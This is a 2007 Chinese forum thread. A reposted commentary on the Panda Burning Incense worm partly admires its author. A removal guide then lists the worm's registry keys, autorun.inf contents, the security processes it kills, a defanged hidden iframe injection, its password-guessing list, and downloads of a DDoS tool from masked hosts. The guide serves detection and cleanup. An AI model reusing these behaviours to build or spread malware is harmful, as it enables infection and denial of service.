“熊猫烧香”你烧了吗~

老紫

评论 “熊猫烧香”究竟在祈祷什么？
CNET中国·PChome.net    作者: 相思树树   责编:维尼   时间:2007-01-24

      “熊猫烧香”真乃我国信息安全界的一大“国宝”，从另一个角度来说，它至少让大家明白了中国网民的网络安全和反病毒的基础知识和意识有待提高，也让各大病毒厂商从自己吹捧的各项专利技术和各种“国际领先水平”的头衔中彻底醒悟了过来。

      “熊猫烧香”病毒红了，在它三根香的虔诚祈祷下，不到数月便红遍了整个中国，上了CCTV，也让自己的大名摆在了瑞星，江民，金山以及各大信息安全论坛和各类电脑技术交流网站的“头版头条”，就连我们的国宝大熊猫也未曾在IT界有过这等“殊荣”，显示出一派“满城尽烧熊猫香”的壮观场景。

      如果抛开法律和道德层面，单从技术角度来分析的话，“熊猫烧香”真乃我国信息安全界的一大“国宝”。从另一个角度来说，它至少让大家明白了中国网民的网络安全和反病毒的基础知识和意识有待提高，也让各大病毒厂商从自己吹捧的各项专利技术和各种“国际领先水平”的头衔中彻底醒悟了过来。拥有众多的反病毒专利技术和“国际领先水平”的杀毒软件在可爱的“熊猫”面前是如此地不堪一击，往往总是在病毒出尽了风头，危害了数十万用户之后，“专杀工具”才终于姗姗来迟。有人说是“非典”成就了如今一整套的完善卫生预警体系。那么我们可不可以类似地说，正是因为“熊猫烧香”、“威金”，“魔波”等一系列病毒，才使得脆弱的网络变得更加的坚固，才使得人们的防范意识和防范常识更加的深入人心。况且“熊猫烧香”在目前看来，并不是为了经济利益，与各种金钱至上所驱使的流氓软件，诈骗的QQ尾巴相比，或许它烧香只是为了祈祷人们更好的防范网络的安全。

      “熊猫烧香”本身

      “熊猫烧香”是一个传染型的DownLoad，使用Delphi编写，从技术上来说它并没有什么创新之处，却借鉴很多经典病毒，木马甚至是流氓软件的技术优点。综合成了一个拥有可爱的图标却让人闻之色变的病毒。任何一个技术单一拿出来杀毒软件都能应付，但是综合到一起这只“熊猫”却反过来让众多杀毒软件成了它“烧香”时的拜忌品。它的运行原理并不复杂，无非是“复制文件到系统目录和根目录”，“添加注册表启动项”，“利用微软自动播放功能运行”，“针对计算机本身攻击弱口令”，“利用IE浏览器漏洞在网页文件中添加脚本代码”等等一些并不算“最新先进”的技术。但就是这些“不算最新”的技术却在全国上下揭起了一股“烧香”热潮。

      由此说明，我们有大部分网民缺乏最基本的网络安全防范知识，也缺少良好的上网习惯。如果用户能及早打好系统补丁；为系统管理帐户设置复杂无规律的密码；关掉一些不需用到却存在安全隐患(如139，445等)的端口；同时关闭非系统必须的“自动播放”功能；对.gho的系统备份文件设置为“只读”；那么“熊猫烧香”也不至于流传这么广，这么快，也不至于很多企事业单位整个局域网电脑都集体“烧香”。
再来看看我们的各大杀毒软件厂商在这个“金钱至上”的年代，“熊猫烧香”成了众杀毒软件的卖点，或者说成了它促销的一个工具，自身的反病毒技术没有突破性的进步，却大肆鼓吹用户升级病毒库去购买正版，鼓吹企业购买企业版网络级杀毒软件。
事实上，在许多条件下，杀毒软件在病毒面前永远保持着无能为力。防毒的本身在于良好的系统操作习惯以及对网络的不信任态度。结果是：“熊猫烧香”流行了，用户受损失了，而杀毒软件厂商却笑了：“今年的利润指标可以提前完成了……”防病毒厂商受经济利益所驱使的升级鼓吹，在这只可爱的熊猫图标面前终于漏出了本来的面目。

      最后来谈谈“熊猫烧香”的主人

      病毒的作者单从技术角度而言，可称得上是一个真正的顶级黑客，对网络，系统，程序设计等知识的综合运用已达到炉火纯青。与此相对比的是，很多无知的人整天开着别人开发出来的扫描工具，一阵乱扫，偶尔扫到了一二个漏洞，控制了一二台肉鸡或破坏了某网站上的一二个网页，就在论坛上高调的宣扬自己的“战果”，动不动就以黑客自居。更有甚者，为了宣扬自己在“网络江湖”中的威望，弄出一大堆的“黑客排行榜”或“顶级黑客一览表”来，然后把自己也位列其中……我想这类人在“熊猫烧香”的技术含量面前应该感到汗颜和反思。后记:据说“熊猫烧香”的作者决定以后不再对它进行更新了。至于“熊猫”虔诚地“烧香”所代表真正含义，或许只有它的作者知道，或许是在祈祷，或许……如果还有或许的话……

老紫

熊猫烧香病毒专杀及手动修复方案

    本文介绍了熊猫烧香病毒、熊猫烧香病毒变种的查杀方法，及熊猫烧香病毒的手动清除方案。提供了病毒进程为spoclsv.exe和FuckJacks.exe变种的解决方案，和熊猫烧香病毒专杀工具。
　　在动手查杀熊猫烧香病毒之前，强烈建议先注意以下四点：
　　1.本文包含两种熊猫烧香病毒变种的描述，请注意查看病毒症状，根据实际情况选用不同的查杀方法。
　　2.对于被熊猫烧香病毒感染的.exe可执行文件，推荐先备份，再修复！
　　3.找回被熊猫烧香病毒删除的ghost(.gho)文件，请使用EasyRecovery Pro。.gho文件所在分区进行的写操作越少，找回来的几率越大。
　　4.对计算机了解不多的用户，请在专家指导下清除熊猫烧香病毒。

熊猫烧香病毒变种一：病毒进程为“spoclsv.exe”

　　这是“熊猫烧香”早期变种之一，特别之处是“杀死杀毒软件”，最恶劣之处在于感染全盘.exe文件和删除.gho文件（Ghost的镜像文件）。
　　最有“灵感”的一招莫过于在所有htm/html/asp/php/jsp/aspx文件末尾添加一段代码来调用病毒。目前所有专杀工具及杀毒软件均不会修复此病毒行为。需要手动清除病毒添加的代码，且一定要清除。否则访问了有此代码的网页，又会感染。
　　其他老一点的“熊猫烧香”spoclsv变种的病毒行为比此版本少。

　　病毒描述：

　　“武汉男生”，俗称“熊猫烧香”，这是一个感染型的蠕虫病毒，它能感染系统中exe，com，pif，src，html，asp等文件，它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件，（.gho为GHOST的备份文件），使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。

熊猫烧香病毒（非原图）

以下是熊猫烧香病毒详细行为和解决办法：

　　熊猫烧香病毒详细行为：

　　1.复制自身到系统目录下：
　　%System%\drivers\spoclsv.exe（“%System%”代表Windows所在目录，比如：C:\Windows）
　　不同的spoclsv.exe变种，此目录可不同。比如12月爆发的变种目录是：C:\WINDOWS\System32\Drivers\spoclsv.exe。

　　2.创建启动项：

　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
　　"svcshare"="%System%\drivers\spoclsv.exe"

　　3.在各分区根目录生成病毒副本：

　　X:\setup.exe
　　X:\autorun.inf
　　autorun.inf内容：
　　[AutoRun]
　　OPEN=setup.exe
　　shellexecute=setup.exe
　　shell\Auto\command=setup.exe

　　4.使用net share命令关闭管理共享：

　　cmd.exe /c net share X$ /del /y
　　cmd.exe /c net share admin$ /del /y
　　5.修改“显示所有文件和文件夹”设置：
　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
　　\Explorer\Advanced\Folder\Hidden\SHOWALL]
　　"CheckedValue"=dword:00000000

　　6.熊猫烧香病毒尝试关闭安全软件相关窗口：

　　天网
　　防火墙
　　进程
　　VirusScan
　　NOD32
　　网镖
　　杀毒
　　毒霸
　　瑞星
　　江民
　　黄山IE
　　超级兔子
　　优化大师
　　木马清道夫
　　木馬清道夫
　　QQ病毒
　　注册表编辑器
　　系统配置实用程序
　　卡巴斯基反病毒
　　Symantec AntiVirus
　　Duba
　　Windows 任务管理器
　　esteem procs
　　绿鹰PC
　　密码防盗
　　噬菌体
　　木马辅助查找器
　　System Safety Monitor
　　Wrapped gift Killer
　　Winsock Expert
　　游戏木马检测大师
　　超级巡警
　　msctls_statusbar32
　　pjf(ustc)
　　IceSword

　　7.尝试结束安全软件相关进程以及Viking病毒（威金病毒）进程：

　　Mcshield.exe
　　VsTskMgr.exe
　　naPrdMgr.exe
　　UpdaterUI.exe
　　TBMon.exe
　　scan32.exe
　　Ravmond.exe
　　CCenter.exe
　　RavTask.exe
　　Rav.exe
　　Ravmon.exe
　　RavmonD.exe
　　RavStub.exe
　　KVXP.kxp
　　KvMonXP.kxp
　　KVCenter.kxp
　　KVSrvXP.exe
　　KRegEx.exe
　　UIHost.exe
　　TrojDie.kxp
　　FrogAgent.exe
　　Logo1_.exe
　　Logo_1.exe
　　Rundl132.exe

　　8.禁用安全软件相关服务：

　　Schedule
　　sharedaccess
　　RsCCenter
　　RsRavMon
　　KVWSC
　　KVSrvXP
　　kavsvc
　　AVP
　　McAfeeFramework
　　McShield
　　McTaskManager
　　navapsvc
　　wscsvc
　　KPfwSvc
　　SNDSrvc
　　ccProxy
　　ccEvtMgr
　　ccSetMgr
　　SPBBCSvc
　　Symantec Core LC
　　NPFMntor
　　MskService
　　FireSvc

　　9.删除安全软件相关启动项：

　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse
　　10.遍历目录修改htm/html/asp/php/jsp/aspx等网页文件，在这些文件尾部追加信息：
　　<iframe src="hxxp://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>
　　但不修改以下目录中的网页文件：
　　C:\WINDOWS
　　C:\WINNT
　　C:\system32
　　C:\Documents and Settings
　　C:\System Volume Information
　　C:\Recycled
　　Program Files\Windows NT
　　Program Files\WindowsUpdate
　　Program Files\Windows Media Player
　　Program Files\Outlook Express
　　Program Files\Internet Explorer
　　Program Files\NetMeeting
　　Program Files\Common Files
　　Program Files\ComPlus Applications
　　Program Files\Messenger
　　Program Files\InstallShield Installation Information
　　Program Files\MSN
　　Program Files\Microsoft Frontpage
　　Program Files\Movie Maker
　　Program Files\MSN Gamin Zone
　　11.在访问过的目录下生成Desktop_.ini文件，内容为当前日期。

　　12.此外，病毒还会尝试删除GHO文件。

　　病毒还尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其它计算机中,它不仅可以攻击无保护的机器，而且带有简单的口令猜测功能。经统计，其具体猜测列表如下：

用户名：Administrator  Guest  admin  Root
密码：1234  password  6969  harley  123456  golf  pussy  mustang  1111  shadow  1313  fish  5150  7777  qwerty  baseball  2112  letmein  12345678  12345  ccc  admin  5201314  qq520  12  123  1234567  123456789  654321  54321  111  000000  abc  pw  11111111  88888888  pass  passwd  database  abcd  abc123  pass  sybase  123qwe  server  computer  520  super  123asd  ihavenopass  godblessyou  enable  xp  2002  2003  2600  alpha  110  111111  121212  123123  1234qwer  123abc  007  aaa  patrick  pat  administrator  root  sex  god  fuckyou  fuck  abc  test  test123  temp  temp123  win  pc  asdf  pwd  qwer  yxcv  zxcv  home  xxx  owner  login  Login  pw123  love  mypc  mypc123  admin123  mypass  mypass123  901100

　　病毒文件内含有这些信息：

　　whboy
    ***武*汉*男*生*感*染*下*载*者***

　　解决方案：

　　1. 结束病毒进程：

　　%System%\drivers\spoclsv.exe
　　不同的spoclsv.exe变种，此目录可不同。比如12月爆发的变种目录是：C:\WINDOWS\System32\Drivers\spoclsv.exe。但可用此方法清除。
　　“%System%\system32\spoclsv.exe”是系统文件。（目前看来没有出现插入该系统进程的变种，不排除变种的手法变化。）
　　查看当前运行spoclsv.exe的路径，可使用超级兔子魔法设置。

　　2. 删除病毒文件：

　　%System%\drivers\spoclsv.exe
　　请注意区分病毒和系统文件。详见步骤1。

　　3. 删除病毒启动项：

　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
　　"svcshare"="%System%\drivers\spoclsv.exe"

　　4. 通过分区盘符右键菜单中的“打开”进入分区根目录，删除根目录下的病毒文件：

　　X:\setup.exe
　　X:\autorun.inf

　　5. 恢复被修改的“显示所有文件和文件夹”设置：

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
　　\Explorer\Advanced\Folder\Hidden\SHOWALL]
　　"CheckedValue"=dword:00000001

　　6. 修复或重新安装被破坏的安全软件。

　　7.修复被感染的程序。可用专杀工具进行修复，收集了四个供读者使用。金山熊猫烧香病毒专杀工具、安天熊猫烧香病毒专杀工具、江民熊猫烧香病毒专杀工具和瑞星熊猫烧香病毒专杀工具。也可用手动方法（见本文末）。

　　8. 恢复被修改的网页文件，可以使用某些编辑网页的工具替换被添加文字为空。机器上有htm/html/asp/php/jsp/aspx等网页文件，一定要删除此段代码。有危险代码的网页一但发布到网页可能会感染其他用户。

熊猫烧香病毒变种二：病毒进程为“FuckJacks.exe”

　　以下是数据安全实验室提供的信息与方法。
　　病毒描述：
　　含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，同时开另外一个线程连接某网站下载ddos程序进行发动恶意攻击。
　　病毒基本情况：
　　[文件信息]
　　病毒名: Virus.Win32.EvilPanda.a.ex$
　　大小: 0xDA00 (55808), (disk) 0xDA00 (55808)
　　SHA1  : F0C3DA82E1620701AD2F0C8B531EEBEA0E8AF69D
　　壳信息: 未知
　　危害级别：高
　　病毒名: Flooder.Win32.FloodBots.a.ex$
　　大  小: 0xE800 (59392), (disk) 0xE800 (59392)
　　SHA1  : B71A7EF22A36DBE27E3830888DAFC3B2A7D5DA0D
　　壳信息: UPX 0.89.6 - 1.02 / 1.05 - 1.24
　　危害级别：高
　　病毒行为：
　　Virus.Win32.EvilPanda.a.ex$ ：

　　1、病毒体执行后，将自身拷贝到系统目录：

　　%SystemRoot%\system32\FuckJacks.exe
　　
　　2、添加注册表启动项目确保自身在系统重启动后被加载：

　　键路径：HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
　　键名：FuckJacks
　　键值："C:WINDOWS\system32\FuckJacks.exe"
　　键路径：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
　　键名：svohost
　　键值："C:WINDOWS\system32\FuckJacks.exe"

　　3、拷贝自身到所有驱动器根目录，命名为Setup.exe，并生成一个autorun.inf使得用户打开该盘运行病毒，并将这两个文件属性设置为隐藏、只读、系统。
　　C:autorun.inf    1KB    RHS
　　C:setup.exe    230KB    RHS

　　4、关闭众多杀毒软件和安全工具。

　　5、连接*****.3322.org下载某文件，并根据该文件记录的地址，去www.****.com下载某ddos程序，下载成功后执行该程序。

　　6、刷新bbs.qq.com，某QQ秀链接。

　　7、循环遍历磁盘目录，感染文件，对关键系统文件跳过，不感染Windows媒体播放器、MSN、IE 等程序。

　　Flooder.Win32.FloodBots.a.ex$ ：

　　1、病毒体执行后，将自身拷贝到系统目录：

　　%SystemRoot%\SVCH0ST.EXE（注意文件名中的“0”是数字“零”，不是字母“o”）
　　%SystemRoot%\system32\SVCH0ST.EXE（注意文件名中的“0”是数字“零”，不是字母“o”）

　　2、该病毒后下载运行后，添加注册表启动项目确保自身在系统重启动后被加载：

　　键路径：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
　　键名：Userinit
　　键值："C:WINDOWS\system32\SVCH0ST.exe"

　　3、连接ddos2.****.com，获取攻击地址列表和攻击配置，并根据配置文件，进行相应的攻击。
　　配置文件如下：

　　www。victim.net:3389
　　www。victim.net:80
　　www。victim.com:80
　　www。victim.net:80
　　1
　　1
　　120
　　50000　　

　　解决方案：

　　1. 断开网络
　　2. 结束病毒进程：%System%\FuckJacks.exe
　　3. 删除病毒文件：%System%\FuckJacks.exe
　　4. 右键点击分区盘符，点击右键菜单中的“打开”进入分区根目录，删除根目录下的文件：
　　X:\autorun.inf
　　X:\setup.exe

　　5. 删除病毒创建的启动项：

　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
　　"FuckJacks"="%System%\FuckJacks.exe"
　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
　　"svohost"="%System%\FuckJacks.exe"

　　6. 修复或重新安装反病毒软件

　　7. 使用反病毒软件或专杀工具进行全盘扫描，清除恢复被感染的exe文件。也可用以下的手动方法恢复文件。

　　手动恢复中毒文件（在虚拟机上通过测试，供参考）
　　1.在清除病毒文件的同时不删除%SYSTEM%下面释放FuckJacks.exe的这个文件，即执行之前的步骤1、2、4、5。
　　2.打开“运行”输入“gpedit.msc”打开组策略－本地计算机策略－windows设置－安全设置－软件限制策略－其它规则。在其它规则上右键选择－新散列规则－打开新散列规则窗口
　　3.在文件散列上点击浏览找到%SYSTEM%下面释放FuckJacks.exe文件。安全级别选择－不允许的。确定后重启。
　　4.重启后可以双击运行已经被熊猫感染的程序。运行程序后该FuckJacks.exe文件会在注册表里的Run键下建立启动项（不会有问题的）。
　　5.双击运行被感染的程序已经恢复原来样子了。全部回复后，用SREng把FuckJacks.exe在注册表里的启动项删除即可！

    专杀工具

    把专杀工具文件下载至本机，解压后双击运行即可有效查杀该蠕虫。
    熊猫烧香专杀工具：http://download.it168.com/08/0804/65455/65455_4.shtml
    江民“威金”蠕虫专杀工具(“熊猫烧香”蠕虫专杀工具):http://www.jiangmin.com/download/zhuansha04.htm
    瑞星Worm.Nimaya (熊猫烧香)专用清除工具 :http://it.rising.com.cn/Channels/Service/2006-11/1163505486d38734.shtml
    金山"武汉男生"(熊猫烧香)专杀工具:  http://tool.duba.net/zhuansha/253.shtml

    防范措施

     第一：修改administrator组成员口令，一定要使用安全口令，当然是指八位字符以上，或者字母、数字、字符混用，不用让病毒破了。修改方法：右键单击“我的电脑”，在弹出的右键菜单中选择“管理”，点开“管理”对话框中的“本地用户和组”，在右边的窗格中，选择具备管理员权限的用户名，单击右键，选择设置密码，输入新密码就行。

     第二：QQ、UC的漏洞已经被该病毒利用，用户应该去他们的官方网站打好最新补丁。

     第三：该病毒会利用IE浏览器的漏洞进行攻击，因此用户应该给IE打好所有的补丁。如果必要的话，用户可以暂时换用Firefox、Opera等比较安全的浏览器。

     第四：利用组策略，关闭所有驱动器的自动播放功能。步骤：单击“开始/运行”，输入“gpedit.msc”，打开“组策略编辑器”，依次点开“计算机配置/管理模板/系统”，双击打开右边的窗格中选择“关闭自动播放”属性，在“设置”选项卡下面，选中“已启用”，在“关闭自动播放”的下拉框中选择所有驱动器，确定后关闭。最后，在开始，运行中输入gpupdate，确定后，该策略就生效了。

     第五：修改文件夹选项，以查看不明文件的真实属性，避免无意双击骗子程序中毒。步骤：打开资源管理器（按windows徽标键＋E），单击“工具/文件夹选项”，切换到“查看”选项卡，在高级设置中，选择查看所有文件，取消隐藏受保护的操作系统文件，取消隐藏文件扩展名。

     第六：时刻保持操作系统获得最新的安全更新。

     第七：启用windows防火墙保护本地计算机。

     最后，每天及时升级最新杀毒软件，这个就不用提了吧。

绿茶瓜子

前两天我的卖咖啡杀了一堆DESKTOP，还有那个GAMESETUP。
哇哈哈

笑红尘

前几个星期在U9上中了，还好当时我的遨游2.0出现关闭，我又发现杀毒软件被关，连冰刃都打不开，进程中发现SVCH0ST.EXE，在他没蔓延开始给杀了

梓木

[em01] 呵呵,该死的病毒,希望不要碰到哦

liumeteor

怕怕……

小荣

前段时间中了威金，烦死了！放病毒的人真缺德，不会有好报的！

SSZ

好象作者才15岁...

wshyp007

原帖由 SSZ 于 2007-1-25 08:51 发表
好象作者才15岁...

不是吧,这么小就不学好?

eightzone

前阵子单位的局域网中了熊猫，四十几台电脑丫～～～，搞了一个礼拜

小荣

原帖由 SSZ 于 2007-1-25 08:51 发表
好象作者才15岁...

又一电脑神童！

老徐最可爱

原帖由 SSZ 于 2007-1-25 08:51 发表
好象作者才15岁...

不会吧！这么厉害！

标标

我刚中过

孤单地铁

原帖由 绿茶瓜子 于 2007-1-24 23:26 发表
前两天我的卖咖啡杀了一堆DESKTOP，还有那个GAMESETUP。
哇哈哈

   


高！！！

hanzhi

原帖由 SSZ 于 2007-1-25 08:51 发表
好象作者才15岁...

要是把这些才华用到正规上就好了，咱中国不怕后继没人了！~~[em01]